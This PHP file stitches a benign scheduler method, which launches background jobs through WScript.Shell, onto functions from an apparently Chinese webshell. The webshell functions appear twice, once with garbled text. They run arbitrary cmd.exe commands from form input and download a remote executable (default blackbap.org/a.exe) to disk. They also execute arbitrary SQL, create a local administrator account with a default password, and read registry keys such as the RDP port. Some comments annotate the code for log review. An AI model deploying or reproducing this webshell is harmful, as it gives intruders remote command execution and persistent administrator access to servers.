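/**
 * Launch a scheduler job in a detached background process on Windows.
 *
 * Uses the WScript.Shell COM object to start
 * `<php_binary> -f run_job.php <job id> <runner id>` with no console window
 * and without waiting for it to finish.
 *
 * @param object $job the job to launch; only $job->id is read here
 *                    (presumably the scheduler's job record — confirm at the call site)
 * @return void
 */
protected function runWindows($job)
{
    // $sugar_config is never assigned in this method, yet its
    // ['cron']['php_binary'] entry is read below; without pulling it in from
    // global scope the command prefix evaluates to an empty string.
    // Assumes the application keeps its configuration in this global — confirm.
    global $sugar_config;

    if (!$this->checkPHPBinary($job)) {
        return;
    }
    if (!extension_loaded("COM")) {
        $this->fail("Cannot run PHP binary, please enable COM extension");
        // fail() is not guaranteed to end the request; do not fall through to
        // `new COM`, which is a fatal error when the extension is absent.
        return;
    }
    $WshShell = new COM("WScript.Shell");
    // run_job.php is resolved relative to the project root, two levels up.
    chdir(dirname(__FILE__) . "/../../");
    // NOTE(review): $job->id and getMyId() are interpolated into the command
    // line unescaped; this is only safe while both are internally generated
    // identifiers and never request-controlled — verify at the call sites.
    $command = sprintf("%s -f run_job.php %s %s", $sugar_config['cron']['php_binary'], $job->id, $this->getMyId());
    // Run(command, windowStyle = 0 -> hidden, waitOnReturn = false): fire and forget.
    $WshShell->Run($command, 0, false);
    $WshShell->Release();
}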
/**
 * Webshell "COM" panel: renders one of four forms chosen by $_GET['o'] and,
 * on POST, drives a Windows COM object with the submitted values.
 *
 * As visible in this function every mode acts directly on request data with
 * no authentication, authorisation or validation:
 *  - 'downloader':  fetches $_POST['durl'] and writes the body to
 *                   $_POST['dpath'] through File_Write();
 *  - 'wscript':     appends $_POST['cmd'] to "cmd.exe /c" and echoes stdout;
 *  - 'application': launches $_POST['run'] with "/c " . $_POST['cmd'] as
 *                   arguments through ShellExecute;
 *  - 'adodb':       opens an ADO connection with $_POST['string'] and runs
 *                   $_POST['sql'], printing the result rows.
 * Any gate would have to live in the caller, which is not visible here.
 *
 * For log review the request shape is distinctive: query ?s=h&o=<object>
 * with POST fields durl/dpath, cmd, run, string and sql.
 *
 * Depends on File_Str() and File_Write(), defined elsewhere in the same
 * script. Apart from the ADO field values, everything is echoed unescaped,
 * including the submitted values reflected back into the form inputs.
 *
 * @return true always, whichever branch ran
 */
function Com_h()
{
    // Mode selector from the query string; defaults to the ADO panel.
    $object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
    print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a> 
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
    if ($object == 'downloader') {
        // Defaults: a hard-coded remote URL and a drop path next to this script.
        $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
        $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe');
        print <<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
        if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
            echo '<div class="actall">';
            // Remote fetch with warnings suppressed; a falsy body (including an
            // empty or "0" response) is reported as a failed download.
            $contents = @file_get_contents($_POST['durl']);
            if (!$contents) {
                echo '无法下载数据';
            } else {
                // File_Write() (defined elsewhere) decides success; the target path
                // is the raw POST value.
                echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败';
            }
            echo '</div>';
        }
    } elseif ($object == 'wscript') {
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        print <<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
        if (!empty($_POST['cmd'])) {
            echo '<div class="actall">';
            $shell = new COM('wscript');
            // The raw POST value is appended to "cmd.exe /c"; errors are suppressed.
            $exe = @$shell->exec("cmd.exe /c " . $cmd);
            // Drains the child's stdout and echoes it unescaped inside <pre>.
            $out = $exe->StdOut();
            $output = $out->ReadAll();
            echo '<pre>' . $output . '</pre>';
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    } elseif ($object == 'application') {
        $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt';
        print <<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
        if (!empty($_POST['run'])) {
            echo '<div class="actall">';
            $shell = new COM('application');
            // Only the loose comparison of ShellExecute's return with '0' decides
            // which message is printed; the launch itself is not otherwise checked.
            echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败';
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    } elseif ($object == 'adodb') {
        $string = isset($_POST['string']) ? $_POST['string'] : '';
        $sql = isset($_POST['sql']) ? $_POST['sql'] : '';
        // The heredoc below carries client-side JavaScript that fills the two
        // inputs with example connection strings / statements; it is not
        // executed server-side.
        print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==5) return false;
\tStr = new Array(12);  
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";
\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**";
\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**";
\tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
\tStr[6] = "SELECT * FROM [TableName] WHERE ID<10";
\tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')";
\tStr[8] = "DELETE FROM [TableName] WHERE ID=1";
\tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1";
\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[11] = "DROP TABLE [TableName]";
\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
\tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
<option value="13">删除字段</option>
</select></div>
<div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div>
</form>
END;
        // Only the connection string gates execution; an empty $sql is still
        // handed to Execute().
        if (!empty($string)) {
            echo '<div class="actall">';
            // Connection string and SQL are used verbatim with errors suppressed.
            $shell = new COM('adodb');
            @$shell->Open($string);
            $result = @$shell->Execute($sql);
            // $result is dereferenced here before the truthiness check below, so
            // a failed Execute() never reaches the failure message.
            $count = $result->Fields->Count();
            for ($i = 0; $i < $count; $i++) {
                $Field[$i] = $result->Fields($i);
            }
            // Echoes the raw SQL text back unescaped.
            echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>';
            // Walks the recordset, printing every field value (HTML-escaped),
            // one per line, until EOF.
            if (!empty($count)) {
                while (!$result->EOF) {
                    for ($i = 0; $i < $count; $i++) {
                        echo htmlspecialchars($Field[$i]->value) . '<br>';
                    }
                    @$result->MoveNext();
                }
            }
            $shell->Close();
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    }
    // Reports success to the caller regardless of which branch ran.
    return true;
}
/**
 * Webshell "winshell" panel (Windows only), selected by $_GET['winshell'].
 *
 *  - 'wscript':   runs $_POST['wcpth'] (default cmd.exe) followed by " /c "
 *                 and $_POST['wcmd'] through WScript.Shell and echoes stdout;
 *  - 'shelluser': creates a local account named $_POST['wuser'] with the
 *                 password $_POST['wpasw'] through Shell.Users and sets its
 *                 AccountType to 3 (presumably an administrator type — confirm);
 *  - 'regedit':   reads the registry value at $_POST['regpath'] via RegRead();
 *  - otherwise:   prints a menu linking the three modes.
 *
 * No authentication or input validation is performed in this function. The
 * $_GET/$_POST reads are not isset()-guarded, so a request omitting them also
 * raises undefined-index notices. Request shape for log review:
 * ?s=jk&winshell=<mode> with hidden field do=do plus wcmd / wuser,wpasw /
 * regpath.
 *
 * UI strings in this copy are mojibake (a GBK-encoded file decoded as another
 * charset); they are runtime strings and are left as-is.
 *
 * @return void
 */
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    // Mode comes straight from the query string (no isset guard).
    if ($_GET['winshell'] == 'wscript') {
        // Truthiness defaults: a POSTed '' or '0' falls back to the hard-coded value.
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        // Both text inputs below are named "wcmd"; no field named "wcpth" is
        // rendered, so a submission from this form always uses the $wcpth default.
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // Command line "<wcpth> /c <wcmd>", built from raw POST values.
            $ww = $wcpth . " /c " . $wcmd;
            // `new` raises com_exception on failure rather than returning false,
            // so the `or die(...)` arm is never taken.
            $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
            $phpexec = $phpwsh->exec($ww);
            // Reads a method on an undefined variable: $wshexec is never assigned
            // in this function.
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
        // Assignment, not comparison: this branch runs on every request to this
        // mode, including the initial GET that merely renders the form.
        if ($_POST['do'] = 'do') {
            // Account creation with no success checking on any of the three calls.
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        // Default target is the RDP listening-port value.
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '����: ' . $e->getMessage();
            }
            // Echoed even when RegRead threw, in which case the variable is undefined.
            echo $registry_proxystring;
        }
    } else {
        // Index view: $tip closes the <h5> opened inside the heredoc below.
        $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
    }
}
/**
 * Webshell "winshell" panel (Windows only), selected by $_GET['winshell'].
 *
 *  - 'wscript':   runs $_POST['wcpth'] (default cmd.exe) followed by " /c "
 *                 and $_POST['wcmd'] through WScript.Shell and echoes stdout;
 *  - 'shelluser': creates a local account named $_POST['wuser'] with the
 *                 password $_POST['wpasw'] through Shell.Users and sets its
 *                 AccountType to 3 (the form labels this "add administrator");
 *  - 'regedit':   reads the registry value at $_POST['regpath'] via RegRead();
 *  - otherwise:   prints a menu linking the three modes.
 *
 * No authentication or input validation is performed in this function. The
 * $_GET/$_POST reads are not isset()-guarded, so a request omitting them also
 * raises undefined-index notices. Request shape for log review:
 * ?s=jk&winshell=<mode> with hidden field do=do plus wcmd / wuser,wpasw /
 * regpath.
 *
 * @return void
 */
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    // Mode comes straight from the query string (no isset guard).
    if ($_GET['winshell'] == 'wscript') {
        // Truthiness defaults: a POSTed '' or '0' falls back to the hard-coded value.
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        // Both text inputs below are named "wcmd"; no field named "wcpth" is
        // rendered, so a submission from this form always uses the $wcpth default.
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // Command line "<wcpth> /c <wcmd>", built from raw POST values.
            $ww = $wcpth . " /c " . $wcmd;
            // `new` raises com_exception on failure rather than returning false,
            // so the `or die(...)` arm is never taken.
            $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
            $phpexec = $phpwsh->exec($ww);
            // Reads a method on an undefined variable: $wshexec is never assigned
            // in this function.
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
        // Assignment, not comparison: this branch runs on every request to this
        // mode, including the initial GET that merely renders the form.
        if ($_POST['do'] = 'do') {
            // Account creation with no success checking on any of the three calls.
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        // Default target is the RDP listening-port value.
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '内容: ' . $e->getMessage();
            }
            // Echoed even when RegRead threw, in which case the variable is undefined.
            echo $registry_proxystring;
        }
    } else {
        // Index view: $tip closes the <h5> opened inside the heredoc below.
        $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
    }
}